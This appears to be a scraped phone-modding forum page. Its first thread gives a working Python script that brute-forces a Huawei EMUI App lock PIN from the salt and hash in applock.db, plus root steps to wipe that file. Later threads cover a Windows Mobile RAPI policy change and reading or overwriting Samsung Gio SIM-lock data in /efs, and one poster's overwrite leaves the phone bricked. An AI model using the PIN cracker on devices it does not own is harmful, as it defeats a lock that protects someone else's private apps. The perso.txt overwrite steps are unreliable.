How to reset (or bruteforce) EMUI "App lock" PIN [ROOT] - Huawei P20 Pro Guides, News, & Discussion

What to do if you forgot a PIN/password for Huawei EMUI "App lock" feature? I couldn't find an existing solution, so I had to solve the problem for myself. I have a Huawei p20 pro phone, but this solution is also suitable for other devices running on EMUI Android OS.
In my case, my root rights helped me, but if you don’t have them, you can probably solve the problem by using the ADB console (see UPDATE below).
So, the PIN is stored in the file "/data/misc/hsm/databases/applock.db". If you have root rights, you can delete it (and other files like "applock.db-shm", "applock.db-wal", "applock.db-journal", etc), which will reset all the settings for "App lock". Or with using any sqlite-editor on PC you can open "applock.db" file, and erase the "encrypt_password_sha256_salt" and "encrypt_password_sha256" fields in the "applockpreference" table.
In both cases restart the phone, the PIN code should disappear.
If you do not have root rights (so you cannot delete/edit the file "applock.db"), but you can read it, then you may use this python3 code (you can use any online interpreter to run it) to bruteforce PIN in less than a minute:
Code:
import hashlib, binascii
encrypt_password_sha256_salt = '609605825498166908'
encrypt_password_sha256 = '1000:5b2d362c202d34332c202d32352c202d33332c2034392c2036322c202d38372c2032362c2031312c202d32312c2031352c202d35382c2034312c203132362c2031312c202d34325d:97f6fdf9a44a1f3fb21e2296'
pbkdf2_password = bytes.fromhex(encrypt_password_sha256.split(':')[1])
needed_hash = encrypt_password_sha256.split(':')[2][:24]
result = ''
for i in range(0, 10000):
pin_str = str(i).zfill(4)
pin_and_salt = pin_str + encrypt_password_sha256_salt
sha256_hash = hashlib.sha256(str.encode(pin_and_salt))
sha256_hash_str = sha256_hash.hexdigest()
dk = hashlib.pbkdf2_hmac('sha1', str.encode(sha256_hash_str), pbkdf2_password, 1000)
if binascii.hexlify(dk)[:24].decode("utf-8") == needed_hash:
result = pin_str
break
if (i + 1) % 1000 == 0:
print('{}% done'.format((i + 1) // 100))
if result != '':
print('found: "{}"!'.format(pin_str))
else:
print('hmm... nothing found :(')
UPD:
I tried to get "applock.db" file through ADB console, and failed. "/data/misc/hsm/databases" is not accessible, "HwSystemManager.apk" a.k.a. "com.huawei.systemmanager" does not support "run-as com.huawei.systemmanager" command, and it has a "android:allowBackup=false" param in it's manifest, so "adb backup -noapk com.huawei.systemmanager" doesn't work.
So I can summarize, that my solution doesn't work without root rights (but if you have it, everything will be fine!).

hioma said:
What to do if you forgot a PIN/password for Huawei EMUI "App lock" feature? I couldn't find an existing solution, so I had to solve the problem for myself. I have a Huawei p20 pro phone, but this solution is also suitable for other devices running on EMUI Android OS.
In my case, my root rights helped me, but if you don’t have them, you can probably solve the problem by using the ADB console or an advanced file manager.
So, the PIN is stored in the file "/data/misc/hsm/databases/applock.db". If you have root rights, you can delete it (and other files like "applock.db-shm", "applock.db-wal", "applock.db-journal", etc), which will reset all the settings for "App lock". Or with using any sqlite-editor on PC you can open "applock.db" file, and erase the "encrypt_password_sha256_salt" and "encrypt_password_sha256" fields in the "applockpreference" table.
In both cases restart the phone, the PIN code should disappear.
If you do not have root rights (so you cannot delete/edit the file "applock.db"), but you can read it, then you may use this python3 code (you can use any online interpreter to run it) to bruteforce PIN in less than a minute:
Click to expand...
Click to collapse
password stored in secured partition...
this metbod it would be too simple...
huawei is not stupid... try factory reseting.... before take factory reset,delete google account and logout huawei id...

spityu85hun said:
password stored in secured partition...
this metbod it would be too simple...
huawei is not stupid... try factory reseting.... before take factory reset,delete google account and logout huawei id...
Click to expand...
Click to collapse
This is not "guess", this is a working solution. "/data/misc/hsm/databases/" is secured directory, but (I think) it is accessible through ADB console (and if you have root rights, it 100% accessible and editable, so you can clear or "decipher" PIN, stored as pbkdf2 key). So you can solve problem without wiping, I think, it's a good solution.

hioma said:
This is not "guess", this is a working solution. "/data/misc/hsm/databases/" is secured directory, but (I think) it is accessible through ADB console (and if you have root rights, it 100% accessible and editable, so you can clear or "decipher" PIN, stored as pbkdf2 key). So you can solve problem without wiping, I think, it's a good solution.
Click to expand...
Click to collapse
grat...now helped for thief for hack applocker pin...

Related

"Could not update itsutils.dll" unlock cid error

Hi!
I read the wiki page and I searched on the forum but I did not find answer.
When I try to unlock the cid (I have a G3), the cmd screen give me this message:
"Could not update itsutils.dll to the current version, maybe it is inuse? try restarting your device, or restart activesync"
What i have to do?
Thanks to all.
copy the files "EnableRapi" and "Cert_SPCS" to your device and run them (you can find them inside the folder "Utils".
Then run the "LokiwizMsl.bat" from your computer again and it should work.
This trick was already described in the sim unlock part of the wiki
but i've updated the cid unlock wiki with the info.
Hi!!
I still have that message. Could you check if i'm doing something wrong?
This is the guide from the wiki:
"Do the following :
- Copy the cab's from the Utils folder in the Lokiwiz03a.zip file to your Prophet and execute them (There are two files : "Cert_SPCS.cab" and "EnableRapi.cab")"
Sorry but this is not very clear because:
1) there aren't file called "Lokiwiz03a.zip"
2) Need I to do hard reset (or a soft reset) after execute that 2 files?
Please help me, I'm not the only one with that problem.
Thanks to all.
Pepez said:
Hi!!
I still have that message. Could you check if i'm doing something wrong?
This is the guide from the wiki:
"Do the following :
- Copy the cab's from the Utils folder in the Lokiwiz03a.zip file to your Prophet and execute them (There are two files : "Cert_SPCS.cab" and "EnableRapi.cab")"
Sorry but this is not very clear because:
1) there aren't file called "Lokiwiz03a.zip"
2) Need I to do hard reset (or a soft reset) after execute that 2 files?
Please help me, I'm not the only one with that problem.
Thanks to all.
Click to expand...
Click to collapse
Sorry thats the file from the sim unlock part, I've changed the wiki
the files you need are in pdamobiz.com_downgrade_and_unlockcid.rar
Hi!!! Thanks for your update!
I run the 2 files from my machine without hardreset after that.
That solved the Downgrade.bat operation (i did not receive the "itsutils.dll error") but it didn't work with the Cidunlock.bat command.
With the cidunlock.bat command I had the classic error and this one too from the cmd screen:
"CopyFileToTFFS(acidunlocked.bin:0, 0, 00010000)
ERROR: ITWriteDisk - internal error"
After that I made the last experiment.
I tried to update the rom without unlock the cid and I discovered with the Italian Prophet you don't have to unlock the cid.
So I solve my problem!! Thanks to all!
I hope to help someone with this post!
Easy fix to the "Could not update itsutils.dll to the current version..." error
1. Use prapi.exe to query value of 4097.
D:>prapi.exe -q -p 4097
Default is "2"
2. Use prapi.exe to set value of policy 4097 to "1"
D:\>prapi.exe -p 4097 1
Explanation :
4097
0x1001 RAPI Policy The Remote API (RAPI) policy restricts the access of remote applications that are using RAPI to implement ActiveSync operations on mobile devices.
0 ActiveSync service is shut down. RAPI calls are rejected.
1 Full access to ActiveSync is provided. RAPI calls are allowed to process without restrictions.
2 Access to ActiveSync is restricted to the SECROLE_USER_AUTH (User Authenticated) role. RAPI calls are checked against this role mask before they are granted. ( default )
Also check : http://www.xs4all.nl/~itsme/projects/xda/smartphone-policies.html

[Q] Help with Unlocking -weird things when trying to unlock Samsung Galaxy Gio

I bought my first smart phone Samsung Gio S5660M and tried to unlock it. I tried different ways but weird things happened and I don’t know what causes the problem. I was wondering whether the unlock code would change if I did something to the phone. Now the phone is still locked and I really need and appreciate your help.
First I used the method in the link: http://forum.xda-developers.com/showthread.php?t=1204705 to root and unlock the phone but was not able to finish it. The steps that I have completed are as follows:
To root the phone:
1. Download this file http://www.mediafire.com/download.php?jzvnlbhidsd5f6l
2. Copy root_gb_gio.zip to the root of the SD card and put the card in the phone
3. Shutdown the phone.
4. Put the phone in recovery Mode (press: Home button + Power button toghether)
5. In recovery mode, choose Install Update from SD-card using Vol. up / down key and press Home key to confirm
6. Search for the root_gb_gio.zip file on the SD-card and Press home key again to run the update
7. Reboot
8. Verify in the app folder if SuperUser app is installed properly
9. Reboot
Network Unlock (using ADB Shell from PC).
1. Download and install Samsung Kies to the PC from here: http://www.samsungapps.com/about/onPc.as, also install Samsung USB Driver
2. Download and install ADB which comes with Android SDK from: http://developer.android.com/sdk/index.html
-Go to the "Available Packages" Option on the left Menu
-Click on the "Refresh" Button on the bottom Right and wait until it finish
-From Items select the "Andoid SDK platform-tools, revision 6" Item
-Click the "Install Selected" button on the botton right and wait until it finish then close the Android SDK
3. Add the correct path
-Right-click on Computer Icon (on your Desktop) and select "Properties" from the menu,
-On My PC Properties select the "Advanced Options" Tab
-Click "Advanced System Settings"
-Click "Environment Variables"
-Highlight the "Path" Variable and click the "Edit"
-At the end of the line (and path) add the path: ;C:\Program Files\Android\android-sdk\platform-tools
4. Connect the phone to the computer via the USB cable
-Click on the start button and open the "Run" option, on Run type cmd.exe and press enter. A command prompt window popped out.
-Type the next text to access the ADB Shell: cd C:\Program Files\Android\android-sdk\platform-tools
-Type: adb shell
-Now in adb shell (and executing commands on the phone itself)
-Type the next command: su
-The superuser application popped up on the PHONE SCREEN (yes take a look at the phone screen) asking to allow root privileges to the adb shell. Choose Allow root access for the ADB shell on the phone.
-Type: cd /
-Type : mount -o remount rw /
-Type: mkdir /efs
-Type: mount -o nosuid,ro,nodev -t vfat /dev/block/stl5 /efs
-Type: cat /efs/mits/perso.txt
got a bunch of characters on the screen and a 8 digit number, the unlock code, which is 28572603
-Type: unmount /efs (It should umount /efs, but I typed it wrong)
5. Disconnect the USB cable from the phone
6.Turn the phone off and insert the SIM card
7. Turn on the phone
In the last step it should ask for the unlock code to unlock the phone, however, it didn’t ask for the unlock code. Instead there was a message: “Phone is SIM Corporate Locked” and there is nowhere to input any code.
When I typed “*#7465625#, the result is as follows: Network Lock [OFF], Network Subset Lock [OFF], SP Lock [OFF], CP Lock [ON]. Note that the corporate lock is on. But I could access menu with the foreign SIM card in the phone. When I tried to dial “*#7465625*638*28572603” or “#0111*28572603” with or without foreign SIM card, the message is always something like network not available (cannot recall the exact words). When I went to a FIDO kiosk for help (SIM card is from FIDO), they told me to unroot the phone so that the phone could ask for the unlock code.
I googled corporate lock/SPCK code on the Internet and there is such message: “In 1% of cases to unlock samsung SPCK code is need”, I called Samsung for help with SPCK code. The technical support in Samsung asked me to factory reset the phone by typing “*2767*3855#”. After the reset, the status of the locks were still the same as before, so is the message “Phone is SIM Corporate Locked”. Then Samsung told me that they don’t have SPCK code. I noticed that SuperUser icon was still on the menu after the factory reset.
A further search showed the unlock method of mapping image partition from: http://forum.xda-developers.com/showthread.php?t=1244695 and http://forum.xda-developers.com/showpost.php?p=17148825&postcount=334 (same method). When I went to Shell and typed “su”, not sure whether because of the factory reset or not, superuser or admin denied, so I redid the rooting by following the previous steps, but it only took a few seconds to finish it. Then the steps I followed were:
1, first, go to the command line of pc.(win xp "start->run->cmd" )
and type "cd\", now in the root of the hard drive (also tried cd \Program Files\Android\android-sdk\platform-tools)
2, second, type "adb shell".
3, after that, type "su".
4, then, type "cat /dev/bml5>/sdcard/bml5.img"
5, type twice "exit" to disconnect with gio.
6, type "adb pull /sdcard/bml5.img"
But there is an error message “remote object /sdcar/bml5.img does not exist". I just repeated the steps a few minutes ago to get a few screenshots:
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
(using cd \Program Files\Android\android-sdk\platform-tools)
(using cd \)
(a different error: so I used mount command)
I think at this point (cannot recall after the following tries or at this time) that I inserted a foreign SIM card, the phone began to show message “Network Locked”, took out the foreign SIM card, typed “*#7465625#", weird enough, the result changed to: Network Lock [ON], Network Subset Lock [OFF], SP Lock [OFF], CP Lock [OFF]. Corporate lock is gone but the network lock came back. I don’t know the reason – is that because I did factory reset?
I put the foreign SIM card back to the phone, input the unlock code generated earlier “28572603”, but it was not successful. I decided to go back to the first method (ADB shell from PC) to generate the unlock code again to see whether the result code is the same. However, weird gain, this time no code at all. I reproduced the screenshot a moment ago for the result (I had to cut the screen into two half):
The third method I tried is to unlock the phone by using Android Terminal Emulator, the steps were:
- In Android Market, download and install Android Terminal Emulator
- Boot up the Android Terminal Emulator application
-Using the on-screen keyboard, type su, allowed the permission from the prompt
-Type: cd /
-Type : mount -o remount rw /
-Type: mkdir /efs
-Type: mount -o nosuid,ro,nodev -t vfat /dev/block/stl5 /efs
-Type: cat /efs/mits/perso.txt
The desire result should be a bunch of characters on the screen and a 8 digit number. However, I didn’t get the desire result – it seems that the result is the same as using the first method after factory reset, here is the screenshot (it seems that the shot is incomplete, but I had a hard time to get even such an incomplete shot – the shell would exit when I tried to screenshot):
My questions are: why the same method cannot generate the same code? Is it because I did something to the phone, like factory reset? The unlock code will change because of the situation or it will always keep the same? Why I cannot see the bml5.img? Is it possible I damaged it by chance? I am also worried that now even if I buy uncode code from GSMLiberty, it would not work any more because of what I did to the phone. Is it possible so? What is my option now? (I tried the code once, so I still have another two chances to input unlock code). Is what has happened weird or there is a reason for that?
Thank you very much.
I also pulled the perso.txt file onto my PC and reviewed it in XVI32. It does not look like any of the files others mentioned (a lot of 00 or FF followed by a number). Attached here is perso.txt. Is my perso.txt corrupted? If yes, how can I recover it? Thanks.
As far as I know, you're the first person that's reported seeing a CP lock on this phone... One possibility is that this happened instead of plain old bricking when you mistyped the umount command the first time around.
Is your IMEI still intact?
Did you reboot the phone since your third attempt?
Did you by any chance keep the first perso.txt you cat'ed on your first attempt?
The suggestion below is at best a shot in the dark and could very well worsen the situation. With that out of the way...
If your IMEI is still intact, you could try booting in CWM, mounting /efs as rewritable, and upload the attached perso.txt, unmount efs and reboot. The file is simply my own perso.txt, from an unlocked 5660M, with your unlock code put in place of mine in a Unix line-ending aware editor. (Another, albeit riskier possibility would be to mount rewritable in the main OS and cat the file into place, then unmount and reboot.)
Good luck,
Darkshado
Thank you, Darkshado, for answering my questions.
Yes the IMEI is still intact. What is weird is that now CP is off and network lock is on after I don't know which operation - I thought it should be due to the factory reset, but after factory reset, the status was still CP [ON] and network lock [OFF]. The I did reroot. The phone was rebooted many times after each attempt, and I only input unlock code once so I still have another two chances.
No I didn't make a copy of the original perso.txt as I almost knew nothing when I first tried.
About unmount mistake, is it so severe if there is a typo? My thought was that mounting and unmounting just control access to the file. When we mount a file, we get access to the file. If we forget to unmount it, it leave a hole for others to access. Is my understanding right? If yes, the typo in unmount command for the first method should not be a big deal as I rebooted the phone after an probably unsuccessful unmount.
As to the perso.txt, what I guess is that the file perso.txt contains all the unlock codes and when we input unlock code from the screen, the system will compare the input code with the code in perso.txt. If they are the same, unlock succeeds, which is similar to using password when we login anywhere. Am I right?
I actually think that uploading your perso.txt mught be a solution. But before doing that, I think it is better to compare your perso.txt with another perso.txt from another phone to see whether the difference is only the unlock code. If yes, the solution will succeed. However, if the perso.txt files from different phones are quite different -like the location of the unlock code and other data that is not 00 or FF, there is a good chance that it's very risky. Do you have another perso.txt available? Or anybody in the forum has a perso.txt available to compare?
My other question is how useful is this perso.txt. If I delete it totally by chance and ask people to unlock the phone from hardware, will the system still operate normally?
I'm going to try to factory reset the phone and reroot again - My PC is in repair and I'll try after I get my PC back - to see whether perso.txt could be restored. Do you have bml5.img in your phone? I don't know why I don't have it on my phone. But from the forum, it looks like that the bml5.img is very similar to perso.txt, only 00 becomes FF or vice verse.
Thanks again for your help.
SPnewb said:
Thank you, Darkshado, for answering my questions.
Yes the IMEI is still intact. What is weird is that now CP is off and network lock is on after I don't know which operation - I thought it should be due to the factory reset, but after factory reset, the status was still CP [ON] and network lock [OFF]. The I did reroot. The phone was rebooted many times after each attempt, and I only input unlock code once so I still have another two chances.
Click to expand...
Click to collapse
That is very strange. What, if any, SIMs did you have in the phone when attempting the unlock at the different stages? Was the Fido SIM in at any time before trying to get an unlock code prompt?
As far as I know, the factory reset operation, at least when triggered from recovery, only wipes the /data and /cache partitions. Is anything done to NV items? I don't have any data to tell.
About unmount mistake, is it so severe if there is a typo? My thought was that mounting and unmounting just control access to the file. When we mount a file, we get access to the file. If we forget to unmount it, it leave a hole for others to access. Is my understanding right? If yes, the typo in unmount command for the first method should not be a big deal as I rebooted the phone after an probably unsuccessful unmount.
As to the perso.txt, what I guess is that the file perso.txt contains all the unlock codes and when we input unlock code from the screen, the system will compare the input code with the code in perso.txt. If they are the same, unlock succeeds, which is similar to using password when we login anywhere. Am I right?
Click to expand...
Click to collapse
Your understanding about mounting and unmounting is correct, but I am not certain that perso.txt is actually used by the phone to check the unlock code. It may also be written there for some other reasons...
The problem with our phones is that corruption has occurred by merely reading the stl5 partition the wrong way.
I actually think that uploading your perso.txt mught be a solution. But before doing that, I think it is better to compare your perso.txt with another perso.txt from another phone to see whether the difference is only the unlock code. If yes, the solution will succeed. However, if the perso.txt files from different phones are quite different -like the location of the unlock code and other data that is not 00 or FF, there is a good chance that it's very risky. Do you have another perso.txt available? Or anybody in the forum has a perso.txt available to compare?
My other question is how useful is this perso.txt. If I delete it totally by chance and ask people to unlock the phone from hardware, will the system still operate normally?
Click to expand...
Click to collapse
The idea of comparing some perso.txt files is good, but so far all the perso.txt files I've seen uploaded came from the Euro/Asia 5660 Gio, so we'd need files from a 5660M. They did look almost identical to mine though, with essentially a Bell network identifier at the beginning that wasn't present at all in theirs. One person with a 5660 also posted a before/after set, and the file does change a little after the unlock.
I've been reluctant to try too many things on my EFS partition, like deleting perso.txt to see how the phone reacts, for fear of bricking it.
I'm going to try to factory reset the phone and reroot again - My PC is in repair and I'll try after I get my PC back - to see whether perso.txt could be restored. Do you have bml5.img in your phone? I don't know why I don't have it on my phone. But from the forum, it looks like that the bml5.img is very similar to perso.txt, only 00 becomes FF or vice verse.
Thanks again for your help.
Click to expand...
Click to collapse
There are two "levels" you can access the partitions on the phone. stl is a higher level access, with which you can get correct RFS partitions for instance, while bml is a lower, block-level access. perso.txt is simply a file contained in stl5, also known as the /efs partition. You can read its contents in a round-about way via bml, but you wouldn't want to flash an /efs, /system/ or /data partition through bml.
Unlike reading stl5, reading bml5 has not caused anyone bricking so far. bml5 is sufficient to get the unlock code as well.
Good luck,
Darkshado
Hi Darkshado,
Thank you very much for your help.
Darkshado said:
That is very strange. What, if any, SIMs did you have in the phone when attempting the unlock at the different stages? Was the Fido SIM in at any time before trying to get an unlock code prompt?
Click to expand...
Click to collapse
The phone was locked to Bell, and my SIM card is from FIDO. I also got a Rogers SIM card for testing. When I rooted and generated teh code, I didn't have any SIM card in the phone. When I inserted Fido card after teh first attempt, I got the message " Phone is SIM Coperated locked" [i.e. when CP lock is On and other locks OFF], but I could still use the other functions of the phone. When the CP lock is OFF and Network lock is ON, I could not use the phoen at all because teh screen asked to input unlock code. If no input orcode is wrong, I cannot use the phone at all. Without SIM card, I could still use other functions of the phone.
As far as I know, the factory reset operation, at least when triggered from recovery, only wipes the /data and /cache partitions. Is anything done to NV items? I don't have any data to tell.
Click to expand...
Click to collapse
What is NV items? Can you tell me how I can tell where to see NV items?
Your understanding about mounting and unmounting is correct, but I am not certain that perso.txt is actually used by the phone to check the unlock code. It may also be written there for some other reasons...
Click to expand...
Click to collapse
I was wondering whether the perso.txt is like config file?
The problem with our phones is that corruption has occurred by merely reading the stl5 partition the wrong way.
Click to expand...
Click to collapse
perso.txt is simply a file contained in stl5, also known as the /efs partition. You can read its contents in a round-about way via bml, but you wouldn't want to flash an /efs, /system/ or /data partition through bml.
Click to expand...
Click to collapse
I cannot think of where I read the partition wriong other than I might hav etyped the wrong unmount for the first time followed by a reboot. I actually thinking of falshing the phone, but for the moment I have not read anything about flash yet and have no idea where to find the proper version of files to falsh.
When I pull the perso.txt to PC, I seemed to use the following method (my PC is still in repair so I cannot verify ):
-Type: adb shell
-Now in adb shell
-Type: su
- allow root privileges to the adb shell.
-Type : mount -o remount rw /
-Type: mkdir /efs
-Type: mount -o nosuid,ro,nodev -t vfat /dev/block/stl5 /efs
-Type: exit twice to exit shell
-Type: adb pull /efs/mits/perso.txt
-Type: adb shell (to go back to shell)
-Type: umount
Is there any risk with this method?
About perso.txt,
One person with a 5660 also posted a before/after set, and the file does change a little after the unlock.
Click to expand...
Click to collapse
I will try to see whether I could get some perso.txt files from anotehr forum (redflagdeals). Can you tell me where I can find the before/after set?
Thank you again very much.
Cathy
Hello Cathy,
One big piece of advice I can give you is to try and have a basic understanding of whatever command it is you're typing in an ADB shell.
The "cat" command can take one or many standard inputs (we'll stick to files for now) and output them to a standard output; in our case, the screen or another file.
Its one way of copying a file, or simply seeing its contents depending on where you send it.
With multiple files in the input, you're concatenating them before they get output.
I would not try the method in your last post AT ALL. You already have your code, and I see no reason why your current perso.txt would be of any use. It is a configuration file, it has to do with the various locks, but I wouldn't be able to tell you more. The way yours has been "corrupted" (I'm employing the term loosely here) may be the reason you've seen that CP lock appear. It may also have altered your Network unlock code in unforeseen ways.
I don't remember anyone trying to directly adb pull perso.txt from the /efs partition off a live phone. Do this at your own risk.
The problems we've seen occur are in all likelyhood due to interference between the modem firmware and the higher-level Android OS. That's why even normally "harmless" read commands have caused problems.
The dd command, as well as leaving /efs mounted on normal mode phone shutdown are constants in multiple bricking cases on the Gio and other similar Samsung phones like the Galaxy Ace and Mini.
The lower-level bml5 partition has been deemed safe to read with the dd command so far, even from a live phone.
Completely disable the modem firmware, like in recovery mode, and you can access, and even edit, the /efs partition in a relatively safe manner.
Something interesting happened as I began writing this: I don't know how or when this happened, but I somehow had relocked my phone to Bell!
I decided to try the lock status code you posted above and saw "Network Lock: ON" Slipping another SIM (an unactivated Koodo one) in my Gio prompted for the unlock code, which I typed and got a network unlocked message.
I took another look at the perso.txt file I had modified for you and recognized a number near the beginning: 302610 that's the Bell MNC! I rebooted in recovery, mounted /efs and adb pulled perso.txt again (safe because I was in recovery mode). The file has the exact same length, and a few differences visible in Winmerge or a hex editor of your choosing.
I turns out I can relock and unlock my phone as I see fit! I haven't tried, but I wouldn't be surprised if I could even lock my phone to a network other than Bell.
You also asked about NV items: they're phone settings common to all Qualcomm cellular modem based cellphones. GSM and WCDMA antenna power and gain settings, factory test mode, IMEI, there are thousands.
In the case of the Gio, some are accessible off the EFS (stl5) partition in the /nvm/num/ directory. Others, like the IMEI unfortunately, are stored elsewhere in the phone, I don't know where. We can read all the settings by using two leaked Samsung programs, named QPST and QXDM respectively. We can edit some of them, but unless you know exactly what you're doing, this is an easy way to completely mess up a phone.
One last silly question: did you have a MicroSD memory card in the phone when you tried cat'ing bml5 to /sdcard on your second attempt?
Okay. I think there is a way to solve your unusual lock problems, try the following steps:
Get Odin here
Get the latest Odin-flashable Gio ClockworkMod-based recovery available on XDA.
Download the perso_Cathy.txt attached below.
Flash the CWM-based recovery to your phone.
Reboot in recovery mode and connect the phone to your computer.
In Windows Explorer, go to the directory you've saved perso_Cathy.txt, and shift+right-click on the directory. Open command line from here. (Otherwise, open a command line window and cd to that directory.)
adb shell (notice your shell is already # aka root)
mount -o nosuid,rw,nodev -t vfat /dev/block/stl5 /efs (notice we're mounting rewritable this time)
exit (this will take you back to the regular command line)
adb push perso_Cathy.txt /efs/mits/perso.txt (so we're pushing and renaming at the same time)
adb shell umount /efs (I doubt this is *really* necessary, but better safe than sorry. You can send single commands to the shell this way)
adb reboot
The phone should already be unlocked on reboot.
Good luck,
Darkshado
Hi Darkshado,
Thank you for your quick response.
Darkshado said:
One big piece of advice I can give you is to try and have a basic understanding of whatever command it is you're typing in an ADB shell.
Click to expand...
Click to collapse
That's good advice If I read the whole thread of unlocking first before I began unlocking, there might not have been problems. I began to unlock after reading a few postings. I used Linux long time ago, but obviously I could not recall anything now.
I would not try the method in your last post AT ALL. You already have your code, and I see no reason why your current perso.txt would be of any use. It is a configuration file, it has to do with the various locks, but I wouldn't be able to tell you more. The way yours has been "corrupted" (I'm employing the term loosely here) may be the reason you've seen that CP lock appear. It may also have altered your Network unlock code in unforeseen ways.
Click to expand...
Click to collapse
The code I had was got before the corrupted perso.txt. I had a strong feeling that the input unlock code will be compared with the code in perso.txt for unlocking, Otherwise if perso.txt is not useful any more, why when I input the initially generated unlock code, the unlocking is not successful. The CP lock is now OFF after the perso.txt is corrupted, though it is hard to judge whether CP is ON or not before perso.txt is corrupted because I got the unlock first then I saw CP was ON.
I don't remember anyone trying to directly adb pull perso.txt from the /efs partition off a live phone. Do this at your own risk.
Click to expand...
Click to collapse
Can you tell me what command you use to get perso.txt? From the info below it seems that you use the same or similar commands, but in the recovery mode instead of the normal mode, is it right?
I turns out I can relock and unlock my phone as I see fit! I haven't tried, but I wouldn't be surprised if I could even lock my phone to a network other than Bell.
Click to expand...
Click to collapse
By editing perso.txt only?
One last silly question: did you have a MicroSD memory card in the phone when you tried cat'ing bml5 to /sdcard on your second attempt?
Click to expand...
Click to collapse
Yes, since I inserted the MicroSD card into the phone for rooting, I never took it out. But I can hardly imagine this will cause any problem.
I think there is a way to solve your unusual lock problems, try the following steps:
Get Odin here
Get Ingmar Steen's latest Gio ClockworkMod-based recovery here
Download the perso_Cathy.txt attached below.
Flash the CWM-based recovery to your phone.
Reboot in recovery mode and connect the phone to your computer.
In Windows Explorer, go to the directory you've saved perso_Cathy.txt, and shift+right-click on the directory. Open command line from here. (Otherwise, open a command line window and cd to that directory.)
adb shell (notice your shell is already # aka root)
mount -o nosuid,rw,nodev -t vfat /dev/block/stl5 /efs (notice we're mounting rewritable this time)
exit (this will take you back to the regular command line)
adb push perso_Cathy.txt /efs/mits/perso.txt (so we're pushing and renaming at the same time)
adb shell umount /efs (I doubt this is *really* necessary, but better safe than sorry. You can send single commands to the shell this way)
adb reboot
Click to expand...
Click to collapse
After a second thought, I decided not to flash the memory since I have little knowledge about it and the tools you mentioned here. As you suggest, I should know enough before doing it. So now, I was wondering whether it will solve the problem by just push the file perso_Cathy.txt in your above message to /efs/mits/perso.txt in recovery mode. What do you think? Another quesion is that I wish to back up all the files in the operating system before any more action. Can you tell me how to back up?
My PC is back but now I cannot even install androit SDK on the computer, so I have to bring it back for repair. So the next few days I probably would not be able to try anything, but once I try, I'll let you know the rsult.
Thank you very much.
Cathy
SPnewb said:
I had a strong feeling that the input unlock code will be compared with the code in perso.txt for unlocking
Click to expand...
Click to collapse
It most definitely is compared. From what I can tell, perso.txt contains all the SIM-lock information, status and codes.
Can you tell me what command you use to get perso.txt? From the info below it seems that you use the same or similar commands, but in the recovery mode instead of the normal mode, is it right?
Click to expand...
Click to collapse
Exactly. Recovery mode is what makes the whole thing safe. You need a rooted recovery to do it though.
There are two ways to get the actual perso.txt file off the phone: adb pull (directly or by cat'ing the file to the sd card beforehand) or dd'ing the stl5 partition and extracting perso.txt from it.
By editing perso.txt only?
Click to expand...
Click to collapse
Yes.
After a second thought, I decided not to flash the memory since I have little knowledge about it and the tools you mentioned here. As you suggest, I should know enough before doing it. So now, I was wondering whether it will solve the problem by just push the file perso_Cathy.txt in your above message to /efs/mits/perso.txt in recovery mode. What do you think?
Click to expand...
Click to collapse
I'm pretty confident it will solve the problem, otherwise I would not have gone to the trouble of writing these instructions and uploading the file for you.
Another quesion is that I wish to back up all the files in the operating system before any more action. Can you tell me how to back up?
Click to expand...
Click to collapse
Look here.
My PC is back but now I cannot even install androit SDK on the computer, so I have to bring it back for repair. So the next few days I probably would not be able to try anything, but once I try, I'll let you know the rsult.
Click to expand...
Click to collapse
What does the ADK installer say? If its complaining about not finding the JDK when you've already installed it, just it Back, and then Next. It will detect at that time and proceed with the installation. It's a known bug. Also, stick to JDK version 6 for the time being. Version 7 is so recent there might be some incompatibilities...
Thank you very much.
Click to expand...
Click to collapse
You're welcome.
Goodbye,
Darkshado
The phone is bricked now. What I did is: hole the HOme key while pressing the power key, the phone asked me whether to "reboot the system now" or "update from /sdcard" or "wipe /data XXX factory reset" (sth like factory reset) or "wipe /cach", I chose "reboot the system now". after that , connect the phone to the system. What I did in PC is catured in teh following image:
After that, when rebooting the phone, the phone began to falsh "samsung" and it cannot be shut down any more.
It seems that using other people's perso.txt does not work. One reason may be that, as you said, "perso.txt contains all the SIM-lock information, status and codes", other than unlock code, it might also read each individual phone's information, since that hte perso.txt is not mine, the phone cannot find the proper information, which causes phone to do indefinite loop. If that is the case, instead of uploading a new perso.txt, editing my own (even the corrupted) perso.txt and changing the corresponding location into the unlock code might work, as the phoen could start up before. Another reason may be that by editing the perso.txt, the system might detect the action for example like using CRC, and if only perso.txt is edited, system detected inconsistency and will go into indefinite loop. If I were the developer and I am aware that perople crack the phone, I might using another file or check code to protect. In this case, "I turns out I can relock and unlock my phone as I see fit! I haven't tried, but I wouldn't be surprised if I could even lock my phone to a network other than Bell." might not work.
I guess that now even hardware unlock will not work, becaue when the phone start, it will read "perso.txt" and cannot find the right information. The only solution is push my original corrupted perso.txt back to the phone, but the question is how? Can you advise me what I should do now? SInce the phone does not start up at all, can I still flash the memory using Odin?
Thank you very much.
Cathy
Crap. I'm afraid that if your phone is now bootlooping with no access to recovery mode there is little to be done but to get it serviced or replaced.
No one has been able to flash EFS with Odin yet on our phones.
Also, your image attachment explaining what you attempted exactly is missing...
Look at the perso.txt files in a hex editor, there's no CRC or MD5 like thing anywhere in there. Of course it could be placed elsewhere, but it would be a first to have a booby-trapped phone OS...
I'll try locking my phone to another network within the next week for the heck of it.
Goodbye,
Darkshado
It's the format of the image. I changed to a different image format. You should be able to view the image in the first page now. Anyway, I posted it here again:
I'll try locking my phone to another network within the next week for the heck of it.
Click to expand...
Click to collapse
Let me know the result.
Thanks.
Cathy
SPnewb said:
Anyway, I posted it here again:
Click to expand...
Click to collapse
Please tell me: in what mode were you booted when you did the above?
Recovery?
Was the text blue or orange?
It's not normal that you had to use su. Otherwise your commands were correct starting with mount -o remount rw /
Darkshado said:
Please tell me: in what mode were you booted when you did the above?
Recovery?
Was the text blue or orange?
It's not normal that you had to use su. Otherwise your commands were correct starting with mount -o remount rw /
Click to expand...
Click to collapse
